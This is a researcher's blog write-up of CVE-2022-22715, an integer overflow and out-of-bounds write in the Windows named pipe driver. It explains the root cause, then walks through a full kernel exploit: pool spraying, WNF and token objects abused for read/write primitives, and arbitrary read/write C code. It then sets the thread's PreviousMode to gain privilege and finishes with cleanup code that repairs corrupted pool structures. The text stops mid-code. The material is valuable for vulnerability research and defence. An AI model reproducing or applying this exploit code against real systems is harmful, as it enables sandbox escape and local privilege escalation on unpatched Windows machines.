BackgroundNamed pipe is a named, one-way or duplex pipe for communication between the pipe server and one or more pipe clients. Many browsers and applications use Named Pipe as IPC between browser process and render process. And AppContainer was introduced when Microsoft released Windows 8.1 as a sandbox mechanism to isolate resources access from UWP application.
Since then, some browsers and applications such as old edge or Adobe Reader use AppContainer as their render process sandbox, and of course, the Named Pipe File System added some mechanisms for AppContainer support. As result, it brought Windows Dirty Pipe -- CVE-2022-22715
Root Cause of Windows Dirty PipeThe vulnerability existed in Named Pipe File System Driver - npfs.sys, and the issue function is npfs!NpTranslateContainerLocalAlias. When we invoking NtCreateFile with a named pipe path, it will hit the IRP_MJ_CREATE major function of npfs, it called NpFsdCreate.
__int64 __fastcall NpFsdCreate(__int64 a1, _IRP *a2) { [...] if ( RelatedFileObject ) { [...] } if ( UnicodeString.Length ) { if ( UnicodeString.Length == 2 && *UnicodeString.Buffer == 0x5C && !RelatedFileObject ) // ===> if open root directory goto LABEL_47; } else { if ( !RelatedFileObject || NamedPipeType == 0x201 ) { [...] } if ( NamedPipeType == 0x206 ) { LABEL_47: *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpOpenNamedPipeRootDirectory( // ===> open root directory (__int64)&MasterIrp, v3, (__int64)FileObject); [...] } } if ( ifopenflag ) { if ( !RelatedFileObject ) { if ( createdisposition == 1 ) { *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpOpenNamedPipePrefix( // ====> open a existed directory named pipe (__int64)v33, v3, FileObject, v11, DesiredAccess, RequestorMode); [...] } if ( (unsigned int)(createdisposition - 2) <= 1 ) { *(_OWORD *)&a2->IoStatus.Status = *(_OWORD *)NpCreateNamedPipePrefix( // ====> create a new directory named pipe (__int64)v34, v3, FileObject, (struct _SECURITY_SUBJECT_CONTEXT *)v11, DesiredAccess, RequestorMode, Options_high); [...] } } goto LABEL_57; } [...] Status = NpTranslateAlias((__m128i *)&namedpipename, ClientToken, &v39); // =====> create a new pipe [...] }The function dispatch into different handler function, it depends on the parameters of NtCreateFile, such as RootDirectory of ObjectAttributes or CreateDisposition. And if we create a new named pipe, it will come into NpTranslatedAlias.
NTSTATUS __fastcall NpTranslateAlias(UNICODE_STRING *namedpipename, void *a2, _DWORD *a3) { [...] *(_QWORD *)&String1.Length = 0xE000Ci64; String1.Buffer = L"LOCAL\\"; DestinationString = 0i64; *a3 = 0; Length = _mm_cvtsi128_si32(*(__m128i *)a1); String2 = *a1; String2.Length = Length; if ( Length >= 2u && *String2.Buffer == 0x5C ) { Length -= 2; String2.MaximumLength -= 2; v7 = 1; ++String2.Buffer; String2.Length = Length; } else { v7 = 0; } if ( !Length ) return 0; if ( a2 && Length > 0xCu ) { if ( RtlPrefixUnicodeString(&String1, &String2, 1u) ) // ====> compare "LOCAL\\" and prefix of named pipe name return NpTranslateContainerLocalAlias(a1, a2, a3); // =====> vulnerable code [...] }The named pipe name which can be controlled by us will pass into NpTranslateAlias, the function will get the prefix of the named pipe name and compare it with "LOCAL\", if our named pipe name use "LOCAL\" as the prefix, this will hit the NpTranslateContainerLocalAlias function. It means we can use "\Device\NamedPipe\LOCAL\xxxxx" as the named pipe name.
Finally, we hit the vulnerable function, it's time to show root cause.
NTSTATUS __fastcall NpTranslateContainerLocalAlias(struct _UNICODE_STRING *namedpipename, void *a2, _DWORD *a3) { [...] result = SeQueryInformationToken(a2, TokenIsAppContainer, &TokenInformation); if ( result >= 0 ) { result = SeQueryInformationToken(a2, TokenIsRestricted|TokenGroups, &v28); if ( result >= 0 ) { if ( !TokenInformation && !v28 ) // =====> token must be appcontainer or restricted return 0; [...] v14 = *namedpipename; *(_QWORD *)&v30 = *(_QWORD *)&namedpipename->Length; v15 = v30; v16 = (_WORD *)_mm_srli_si128((__m128i)v14, 8).m128i_u64[0]; v17 = v16; *((_QWORD *)&v30 + 1) = v16; if ( *v16 == '\\' ) { v17 = v16 + 1; ifslash = 1; // ====> if there is "\\" in named pipe name, ifslash will set to 1 v15 = v30 - 2; } else { ifslash = 0; } [...] // ====> calculate the new prefix length v21 = prefixlength + namedpipenamelength + 0x14; v26.MaximumLength = v21; if ( ifslash ) { v21 += 2; // ===> variable v21 is ushort type, it will be add to 0 v26.MaximumLength = v21; } PoolWithTag = (WCHAR *)ExAllocatePoolWithTag(PagedPool, v21, 0x6E46704Eu); // ====> v21 will be 0 because of integer overflow, and it will allocate a small pool. v26.Buffer = PoolWithTag; if ( PoolWithTag ) { if ( ifslash ) { v26.Buffer = PoolWithTag + 1; v26.MaximumLength -= 2; // if ifslash is 1, length 0 minus 2, it will cause integer underflow and the length will be set to 0xfffe } [...] RtlUnicodeStringPrintf( // ====> RtlUnicodeStringPrintf will copy large size(0xfffe) buffer to a small pool cause out of bound write &v26, L"Sessions\\%ld\\AppContainerNamedObjects\\%wZ\\%wZ\\%wZ", (unsigned int)v32, &v35, &DestinationString, &v30); [...] } [...] }First, npfs check the process token privilege if it's appcontianer or restricted, it must meet one of two conditions at least which means the process must be a appcontainer, a restricted sandboxed process or both. And then, function check the named pipe name if the first wchar is "\", if so, npfs set variable |ifslash| to 1. After that, it calculate a new named pipe prefix length, the new named pipe prefix include SID, session number, specify string and etc., finally the new prefix length add named pipe name length and 0x14, and if variable |ifslash| is 1, the total size will add 2 to the final size.
Note that all the variable is ushort type, so there is a obviously integer overflow, if we use a long length named pipe name, the total size will be a small value finally.
After calculation, npfs allocate a small pool because of the small total size, then if |ifslash| is 1, the total size minus 2, if the total size is 0, there is a integer underflow, and the maxiumlength of unicode string will be a large ushort value 0xfffe.
The function RtlUnciodeStringPrintf will copy a string into the new pool buffer, the length of memcpy depends on maxiumlength of unicode string, if we trigger integer underflow before, npfs will copy a large value to a small pool trigger out of bound write.
Crash Dump:
rax=0000000000000000 rbx=ffffe7862a687118 rcx=ffffe7862a687080 rdx=4141414141414141 rsi=4141414141414141 rdi=ffffe7862a6876d0 rip=fffff80313807bc8 rsp=ffffe40ab22d8420 rbp=ffffe7862a4e6820 r8=ffffe40ab22d8470 r9=000001c7aa2763c0 r10=fffff80313807ac0 r11=ffffe7862a687080 r12=0000000000000001 r13=0000000000000001 r14=ffffe78628cbc060 r15=0000000000000000 iopl=0 nv up ei pl zr na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050246 nt!ExAcquirePushLockExclusiveEx+0x108: fffff803`13807bc8 f0480fba2e00 lock bts qword ptr [rsi],0 ds:002b:41414141`41414141=????????????????The crash dump shows the out of bound write corrupt some other objects after the 0x20 pool.
The purpose of NpTranslateContainerLocalAlias function is to translate the named pipe name including "LOCAL\" to a new named pipe name. For example, if the process is an appcontainer sandboxed process, it translates the name pipe name to a format string with "AppContainerNamedObjects", AppContainerNamedObjects is a directory which store some appcontainer related objects in object manager. Npfs finally create a new named pipe object under AppContainerNamedObjects directory in object manager.
But all the size variables type is ushort, this is the root cause of Windows Dirty Pipe.
Challenges of Windows Dirty PipeAfter introducing the root cause of Windows Dirty Pipe, I want to share the challenges of the CVE-2022-22715 before I public my exploitation.
When I trigger the crash and confirm the vulnerability, I quickly realize that the vulnerability is not easy to exploit, there is some challenges I will meet when I do exploit.
- Although integer overflow when npfs calculate the total size could make total size to a small value, such as 0x20\0x30\0x40..., but it must be 0, because we need trigger integer underflow to make maxiumlength of unicode string to a large ushort value for out of bound writing, if we set the total size to larger than 0, after total size minus 2, it's still a small value and out of bound write will not triggered.
- As I said above, the memcpy length is 0xfffe, it means I need to copy a more than 16 pages pool memory to a paged pool segment, this is not easy to make a stable layout.
The first step of my exploitation is try to find a way to complete pool feng shui. In this situation, the corrupted pool must be a 0x20 paged pool, it's a kernel low fragmentation heap(LFH) pool, at first, I want to spray 0x20 LFH pools, and corrupt some 0x20 object to complete exploitation.
But there is a problem that I can't control the vulnerable 0x20 pool position in LFH bucket precisely and the memcpy length is 0xfffe, this may corrupt some unexpected objects or protected pages which cause BSoD.
I don't want to introduce kernel pool allocation deeply in my blog, there are many awesome articles/slides about it. Now let me share an interestring kernel pool allocation mechanism I used when I try to solve the problem.
As we all know, Windows kernel allocate pool segment by backend allocator and allocate subsegment by frontend allocator, and an interestring mechanism is that different type of subsegment can be allocate in the same segment.
That get my attention!
After some tests, I confirm that I can make a 0x20 LFH subsegment and a VS subsegment adjacent. This make my pool feng shui layout.
Stage 1: PreparationBecause vulnerable pool is a paged pool, so I choose WNF as my limited r/w primitive. I use _WNF_STATE_DATA as a limited out of bound read/write object -- the manager object, the maxium read/write range of _WNF_STATE_DATA is 0x1000. And I need to find another object to complete arbitrary address read/write -- the worker object. Actually, it's not difficult to find a suitable object, the object must be a paged pool object including a pointer field that could be used to read/write arbitrary address such as through memcpy.
I finally decided to use _TOKEN object as the worker object, if I invoke NtSetInformationToken with TokenDefaultDacl TokenInformationClass, nt finally invoke nt!SepAppendDefaultDacl copy a user-controlled content to a pointer field store in _TOKEN object.
void *__fastcall SepAppendDefaultDacl(_TOKEN *TOKEN, unsigned __int16 *usercontrolled) { v3 = usercontrolled[1]; v4 = (_ACL *)&TOKEN->DynamicPart[*((unsigned __int8 *)a1->PrimaryGroup + 1) + 2]; result = memmove(v4, usercontrolled, usercontrolled[1]); [...] }And if I invoke NtQueryInformationToken with TokenBnoIsolation TokenInformationClass, nt copy a isolationprefix buffer to usermode memory.
NTSTATUS __stdcall NtQueryInformationToken( HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, PVOID TokenInformation, ULONG TokenInformationLength, PULONG ReturnLength) { [...] case TokenBnoIsolation: [...] memmove( (char *)TokenInformation + 16, TOKEN->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.Buffer, TOEKN->BnoIsolationHandlesEntry->EntryDescriptor.IsolationPrefix.MaximumLength); } [...] }So I could use manager object to construct a fake _TOKEN object structure to modify the adjacent worker object, then use NtSetInformationToken and NtQueryInformationToken as arbitrary r/w primitive.
Another object I need to prepare is the 0x20 spray object, it should be full controlled by me including allocate and free. I find there is a function named nt!NtRegisterThreadTerminatePort.
NTSTATUS __fastcall NtRegisterThreadTerminatePort(void *a1) { CurrentThread = KeGetCurrentThread(); Object = 0i64; result = ObReferenceObjectByHandle(a1, 1u, LpcPortObjectType, CurrentThread->PreviousMode, &Object, 0i64); if ( result >= 0 ) { PoolWithQuotaTag = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, 0x10ui64, 0x70547350u); v4 = PoolWithQuotaTag; if ( PoolWithQuotaTag ) { PoolWithQuotaTag[1] = Object; *PoolWithQuotaTag = CurrentThread[1].InitialStack; result = 0; CurrentThread[1].InitialStack = v4; } else { ObfDereferenceObject(Object); return -1073741670; } } return result; }Function reference a LpcPort object and allocate a 0x20 paged pool for storing the LpcPort object, then store it into _ETHREAD object. If we create a thread and invoke NtRegisterThreadTerminatePort multiple times in thread, it could allocate a large amount of 0x20 paged pool.
Finally there was a pool feng shui plan in my head:
- Spray 0x20 paged pool to fill LFH subsegment, if all segment is full, backend allocation will allocate a new segment, and our new 0x20 LFH subsegment will be located in new segment.
- Spray _TOKEN object and _WNF_STATE_DATA object to fill VS subsegment, make sure they are in same page, and frontend allocation will finally allocate new VS subsegement, it will be located in the segement which created in step 1, adjacent to the LFH subsegment.
So our finally pool feng shui just like following:
Note that I can't predict the vulnerable pool's position in LFH Bucket, but actually I don't care about it, in this pool feng shui situation, the target of out of bound write is occupy the manager object and the worker object in VS subsegment, so I don't need to make pool hole for vulnerable object, just fill the LFH bucket with spray object, and make sure the vulnerable object located at the end LFH bucket.
Stage 2: Pool feng shuiWhen spraying WNF object, I find out that there is another object named _WNF_NAME_INSTANCES be created, it will cause frontend allocation create another LFH segment and affect our pool feng shui layout.
So before I do pool feng shui, I create a lot of 0xd0 pool and free them to make a large amount of 0xd0 pool hole to store _WNF_NAME_INSTANCES objects.
for (UINT i = 0x0; i < 0x4000; i++) {//0xf000 for normal pool hole AllocateWnfObject(0xd0, &gStateName[i]); } for (UINT i = 0x0; i < 0x4000; i++) {//0xf000 fNtDeleteWnfStateName(&gStateName[i]);//0x30 }I allocate a lot amount of spray objects and spray _TOKEN objects and _WNF_STATE_DATA objects first, it will create new LFH subsegment and VS subsegement in the new segment. We can observe the final pool feng shui layout by windbg.
0: kd> !pool ffffb0880d69e000 Pool page ffffb0880d69e000 region is Paged pool *ffffb0880d69e000 size: 20 previous size: 0 (Allocated) *PsTp Process: ffffc10b74a1c080 Pooltag PsTp : Thread termination port block, Binary : nt!ps ffffb0880d69e020 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e040 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e060 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e080 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e0a0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 0: kd> !pool ffffb0880d69f000 Pool page ffffb0880d69f000 region is Paged pool *ffffb0880d69f000 size: 20 previous size: 0 (Free) *.... Owning component : Unknown (update pooltag.txt) ffffb0880d69f020 size: 20 previous size: 0 (Free) .... ffffb0880d69f040 size: 20 previous size: 0 (Free) .... ffffb0880d69f060 size: 20 previous size: 0 (Free) .... ffffb0880d69f080 size: 20 previous size: 0 (Free) .... ffffb0880d69f0a0 size: 20 previous size: 0 (Free) .... 0: kd> !pool ffffb0880d6a0000 Pool page ffffb0880d6a0000 region is Paged pool *ffffb0880d6a0000 size: 20 previous size: 0 (Free) *.... Owning component : Unknown (update pooltag.txt) ffffb0880d6a0020 size: 20 previous size: 0 (Free) .... ffffb0880d6a0040 size: 20 previous size: 0 (Free) .... ffffb0880d6a0060 size: 20 previous size: 0 (Free) .... ffffb0880d6a0080 size: 20 previous size: 0 (Free) .... 0: kd> !pool ffffb0880d6a1000 Pool page ffffb0880d6a1000 region is Paged pool *ffffb0880d6a1000 size: 20 previous size: 0 (Free) *.... Owning component : Unknown (update pooltag.txt) ffffb0880d6a1020 size: 20 previous size: 0 (Free) .... ffffb0880d6a1040 size: 20 previous size: 0 (Free) .... ffffb0880d6a1060 size: 20 previous size: 0 (Free) .... ffffb0880d6a1080 size: 20 previous size: 0 (Free) .... 0: kd> !pool ffffb0880d6a2000 // ======> new VS subsegment header Pool page ffffb0880d6a2000 region is Paged pool *ffffb0880d6a2000 size: 30 previous size: 0 (Free) *.... Owning component : Unknown (update pooltag.txt) ffffb0880d6a2040 size: 880 previous size: 0 (Allocated) Toke ffffb0880d6a28d0 size: 580 previous size: 0 (Allocated) Wnf Process: ffffc10b74a1c080 ffffb0880d6a2e50 size: 190 previous size: 0 (Free) ..D.
As the layout show, there are many free LFH pool holes in the end LFH bucket, and the new VS subsegment is next to the LFH bucket, if we create vulnerable object now, it will be located in one of the free LFH pool hole.
Note the vulnerable object may not located in the last LFH page, but it's not necessary, the out of bound write may corrupt the LFH bucket will not affect our exploitation.
0: kd> r rax=ffffb0880d69e750 rbx=0000000000000002 rcx=0000000000000028 rdx=0000000000000000 rsi=0000000000000000 rdi=ffffe4835a302301 rip=fffff800401c2b31 rsp=ffffe4835a301e00 rbp=ffffe4835a301f00 r8=0000000000000fff r9=00000000000004ca r10=000000006e46704e r11=0000000000001001 r12=ffffe4835a302220 r13=ffffe4835a302310 r14=0000000000000001 r15=000000000000ff01 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00040282 Npfs!NpTranslateContainerLocalAlias+0x391: fffff800`401c2b31 4889442450 mov qword ptr [rsp+50h],rax ss:0018:ffffe483`5a301e50=0000000000000000 0: kd> !pool @rax // ===> vulnerable pool locate at one of free hole in LFH bucket Pool page ffffb0880d69e750 region is Paged pool ffffb0880d69e700 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e720 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 *ffffb0880d69e740 size: 20 previous size: 0 (Allocated) *NpFn Pooltag NpFn : Name block, Binary : npfs.sys ffffb0880d69e760 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e780 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e7a0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e7c0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e7e0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e800 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e820 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e840 size: 20 previous size: 0 (Free) MPCt ffffb0880d69e860 size: 20 previous size: 0 (Free) MPCt ffffb0880d69e880 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e8a0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080 ffffb0880d69e8c0 size: 20 previous size: 0 (Free) MPCt ffffb0880d69e8e0 size: 20 previous size: 0 (Allocated) PsTp Process: ffffc10b74a1c080
Then after invoking RtlUnicodeStringPrintf function, it will out of bound write about 0xfffe memory size content, this corrupt the LFH pool space and VS pool space. And the corrupt data is named pipe name that we could control, we need calculate the malicious payload for modifing the _WNF_STAT_DATA->DataSize.
When we create _WNF_STATE_DATA, we can't set DataSize larger than _WNF_STATE_DATA data region, but after triggerring vulnerability, we could modify it to any value, the maxium value of DataSize is 0x1000, we could gain a limited out of bound r/w primitive to modify the _TOKEN object in next page.
0: kd> dq ffffb0880d6a28d0 l4 ffffb088`0d6a28d0 00001000`00001000 00001000`00001000 ffffb088`0d6a28e0 00001000`00001000 00001000`00001000Stage 3: Gain arbitrary address r/w
In stage 2, we make a pool feng shui, and gain a limited r/w primitive with _WNF_STATE_DATA object, but there is a huge problem. How I find which object handle I need to use?
If I corrupt the object and use it by handle, the corrupted object header data will crash the system. And now, I need to find out a useful manager object(_WNF_STAT_DATA) name and worker object(_TOKEN) handle.
I thought of a solution. For manager object, when we try to read data from _WNF_STATE_DATA data region, we call NtQueryWnfStateData with a specified length, if the length is larger than DataSize, it will return nt error code 0xc0000023. For worker object, when we create a _TOKEN object, there is a unique LUID in _TOKEN object, and it could be queried by NtQueryInformationToken with TokenStatics TokenInformationClass, it named TokenId, we could query them when we spray _TOKEN Object and store it in an array.
Because _WNF_NAME_INSTANCES will not be corrupted, we can use NtUpdateWnfStateData and NtQueryWnfStateData normally.
I have already corrupt some _WNF_STATE_DATA objects in stage 2, and modify DataSize to 0x1000, we could use NtQueryWnfStateData with 0x1000 length parameter to find out the corrupted _WNF_STATE_DATA object, and read out of bound data to find the last corrupted page, the normal page adjacent to corrupted page.
Reading out of bound data will not corrupt the object structure, so we can use NtQueryWnfStateData with 0x1000 length parameter, if _WNF_STATE_DATA object isn't corrupted, it will return 0xC0000023, and if it is, it will return the out of bound data.
If the out of bound data is the malicious data, I can make sure the _WNF_STATA_DATA is not in the last corrupted page, I use this way to find out the last corrupted page so I can read the next normal page with _TOKEN object structure. The _WNF_STATE_DATA object in the last corrupted page is our manager object.
There is a LUID field in _TOKEN object, we gain it from out of bound read data, and match this LUID in array we created before, so that we finally find the worker object.
0: kd> dq 0xffffb0880d6ae000 // ===> the last corrupted page ffffb088`0d6ae000 00010001`00010001 00010001`00010001 ffffb088`0d6ae010 00010001`00010001 00010001`00010001 ffffb088`0d6ae020 00010001`00010001 00010001`00010001 ffffb088`0d6ae030 00010001`00010001 00010001`00010001 0: kd> dq 0xffffb0880d6af000 // ===> the first normal page ffffb088`0d6af000 656b6f54`03880000 00000000`00000000 ffffb088`0d6af010 000007b8`00001000 00000000`00000108 ffffb088`0d6af020 ffffc10b`775e8b80 00000000`00000000 ffffb088`0d6af030 00000000`00008000 00000000`00000001 ffffb088`0d6af040 00000000`00000000 00000000`0008006d
So far, I get the manager object name and worker object handle, then I construct a 0x1000 fake data include fake _TOKEN Object structure and a _WNF_STATE_DATA structure. I have already got the normal _TOKEN object structure content by invoking NtQueryWnfStateData before, I just need to change some value to gain arbitrary r/w primitive.
Read Primitive:
FakeSepCached = malloc(0x48); ZeroMemory(FakeSepCached, 0x48); *(USHORT*)((ULONG_PTR)FakeSepCached + 0x2A) = 0x8; *(UINT64*)((ULONG_PTR)FakeSepCached + 0x30) = ReadAddress; CorruptionData = malloc(OriginalSize); ZeroMemory(CorruptionData, OriginalSize); CopyMemory(CorruptionData, gOccupyWorkerToken, OriginalSize); *(PUINT64)((UINT64)CorruptionData + TokenOffset + 0x480) = (UINT64)FakeSepCached; *(PUINT64)((UINT64)CorruptionData + TokenOffset - 0x30) = (UINT64)3; Status = fNtUpdateWnfStateData(&gWorkerStateName, CorruptionData, OriginalSize, &TypeID, NULL, NULL, NULL); // ===> control manager object if (Status < 0) { free(CorruptionData); free(FakeSepCached); return FALSE; } // ===> arbitrary read Status = fNtQueryInformationToken( TokenHandle, TokenBnoIsolation, &RecvBuffer, RecvBufferSize, &RecvBufferSize);Write Primitive:
CorruptionData = (PCHAR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, OriginalSize); CopyMemory(CorruptionData, gOccupyWorkerToken, OriginalSize); *(PUINT64)(CorruptionData + TokenOffset - 0x30) = 2; *(PUINT64)(CorruptionData + TokenOffset + 0x8c) = 0x10000; *(PUINT64)(CorruptionData + TokenOffset + 0xa8) = (UINT64)pETHREAD + 0x1f0; *(PUINT64)(CorruptionData + TokenOffset + 0xb0) = (UINT64)pETHREAD + 0x1e8; *(PUINT64)(CorruptionData + TokenOffset + 0xb8) = (UINT64)0; fNtUpdateWnfStateData(&gWorkerStateName, CorruptionData, OriginalSize, &TypeID, NULL, NULL, NULL);// ===> control manager object pACL = (PACL)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x48); pACL->AclRevision = 2; pACL->AceCount = 1; pACL->AclSize = 0x48; pACE = (PACE_HEADER)(pACL + 1); pACE->AceSize = 0x48 - sizeof(ACL); pACE->AceType = 50; *(PUINT64)((ULONG_PTR)pACL + 0x18) = (UINT64)pQueueListEntryFlink; *(PUINT64)((ULONG_PTR)pACL + 0x20) = (UINT64)pQueueListEntryBlink; *(PUINT64)((ULONG_PTR)pACL + 0x28) = (UINT64)pNextProcessor; *(PUINT64)((ULONG_PTR)pACL + 0x30) = (UINT64)pProcess; *(PUINT64)((ULONG_PTR)pACL + 0x38) = 0x3; *(PUINT64)((ULONG_PTR)pACL + 0x40) = 0x0100000008000000; // ===> arbitrary write Status = fNtSetInformationToken( TokenHandle, TokenDefaultDacl, &pACL, 8); Stage 4: Elevation of privilege and Fix upWe gain arbitrary address r/w primitive, at first, I just want to replace the process TOKEN to system, it succeed, but after while, I find it's easy to crash. For example, I corrupt some _TOKEN objects, if I open processexplorer, it will travesal user space handle table for every process, it will cause crash when processexplorer access the exploite process handle table.
I need to fix up after exploit, so I decide not replace the process TOKEN, and just modify the _ETHREAD->PreviousMode, if I set previous mode to 0, I inovke NT API such as NtReadVirtualMemory and NtWriteVirtualMemory, kernel will think the thread is running in kernel mode. This is a common technology to elevate privilege, it's convenient to me for elevating of privilege and fixing instead of construct fake object every time.
Finally I use worker object to set _ETHREAD->PreviousMode to 0, and then use NtReadVirtualMemory/NtWriteVirtuaMemory to do elevation of privilege and fix up.
There are some thing we need to do when fixing.
1.Corrupted _Token Object.
I trigger corrupted object crash and realize that it crash because I corrupt the ObjectType in ObjectHeader, so when the nt reference the object, it will crash the system. And I can get the cookie in nt data section and calculate the objecttype in object header. I fix every corrupted _TOKEN object header.
UINT64 pObjHeaderCookie = ntaddr + OBJHEADERCOOKIE; BYTE cookie; X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pObjHeaderCookie, (UINT64)&cookie, (UINT64)sizeof(BYTE), (UINT64)&dwByte); BYTE addrbyte = (pPoolAddress >> 8) & 0xff; BYTE offset = cookie ^ addrbyte ^ TokenTypeIndex; BYTE bModifiedType; for (UINT i = typeindex; i <= modifiedindex; i++) { bModifiedType = offset ^ cookie ^ (((pPoolAddress - i * 0x1000) >> 8) & 0xff); X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)((UINT64)pPoolAddress - i * 0x1000 + 0x88), (UINT64)&bModifiedType, (UINT64)sizeof(BYTE), (UINT64)&dwByte); X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)((UINT64)pPoolAddress - i * 0x1000 + 0x48), (UINT64)&bModifiedType, (UINT64)sizeof(BYTE), (UINT64)&dwByte); }2.Corrupted VS pool structure.
This is the most complicate problem I meet, I do not only corrupt the object structure, but also corrupt the VS pool structure, this will cause BSoD unexpected. I do some reversing in VS allocation deeply and find there is a RBTree to manage VS pool, if I know a VS pool address, I can calculate the VS pool manager address.
When a new VS pool allocate or a old free, it will travesal the RBTree from the VS pool manager, and if I corrupt the VS pool address which means when VS pool manager travesal from the root node and access the corrupted node, it will crash.
So I need to find the crash node from the RBTree root node, and delete it from RBTree, this may cause some memory leak if there are some other VS pools under the corrupted node, but it's better than crash the system.
I calculate the root VS pool, travesal the RBTree and delete the node from the RBTree.
UINT64 zeroSet = 0x0; UINT64 ntaddr = KernelSymbolInfo(); UINT64 pGlobalHeapAddr = ntaddr + GLOBALOFFSET; UINT64 pGlobalHeapValue; UINT64 pPoolChunkAddr = pPoolAddress & 0xfffffffffff00000; UINT64 pPoolChunkValue; X64Call(pReadVirtualMemory, 5 , (UINT64)GetCurrentProcess(), (UINT64)pGlobalHeapAddr, (UINT64)&pGlobalHeapValue, (UINT64)sizeof(UINT64), (UINT64)&dwByte); X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pPoolChunkAddr + 0x10, (UINT64)&pPoolChunkValue, (UINT64)sizeof(UINT64), (UINT64)&dwByte); UINT64 pHpMgrAddr = ((UINT64)pGlobalHeapValue ^ (UINT64)pPoolChunkAddr ^ (UINT64)pPoolChunkValue ^ 0xA2E64EADA2E64EAD) - 0x100 + 0x290; // ======> calculate the VS pool manager address UINT64 pRootChunkAddr; UINT64 pRightChunk; UINT64 pLeftChunk; X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pHpMgrAddr, (UINT64)&pRootChunkAddr, (UINT64)sizeof(UINT64), (UINT64)&dwByte); X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); // ====> get the root VS pool address UINT64 pTargetChunk = pPoolAddress & 0xffffffffffff0000; UINT64 pFinalChunk = NULL; UINT64 pTempLeftChunk = pLeftChunk, pTempRightChunk = pRightChunk; UINT64 pTempRootChunk; pRootChunkAddr = pLeftChunk; // ====> traversal from left chunk while (pLeftChunk != 0 && pRightChunk != 0) { X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); if (pTargetChunk == pRootChunkAddr & 0xffffffffffff0000) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x10, (UINT64)&pTempRootChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); break; } pTempRootChunk = pRootChunkAddr; if (pLeftChunk > pRootChunkAddr) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pLeftChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); pRootChunkAddr = pRightChunk; continue; } else if (pRootChunkAddr > pRightChunk) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRightChunk, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); pRootChunkAddr = pLeftChunk; continue; } if (pTargetChunk < pRootChunkAddr) { pRootChunkAddr = pLeftChunk; continue; } if (pTargetChunk > pRootChunkAddr) { pRootChunkAddr = pRightChunk; continue; } } pRootChunkAddr = pTempRightChunk; // ====> traversal from right chunk while (pLeftChunk != 0 && pRightChunk != 0) { X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&pLeftChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); X64Call(pReadVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x8, (UINT64)&pRightChunk, (UINT64)sizeof(UINT64), (UINT64)&dwByte); if (pTargetChunk == pRootChunkAddr & 0xffffffffffff0000) { X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr, (UINT64)&fakenode, (UINT64)sizeof(FAKETREENODE), (UINT64)&dwByte); X64Call(pWriteVirtualMemory, 5, (UINT64)GetCurrentProcess(), (UINT64)pRootChunkAddr + 0x10, (UINT64)&pTempRootChunk, 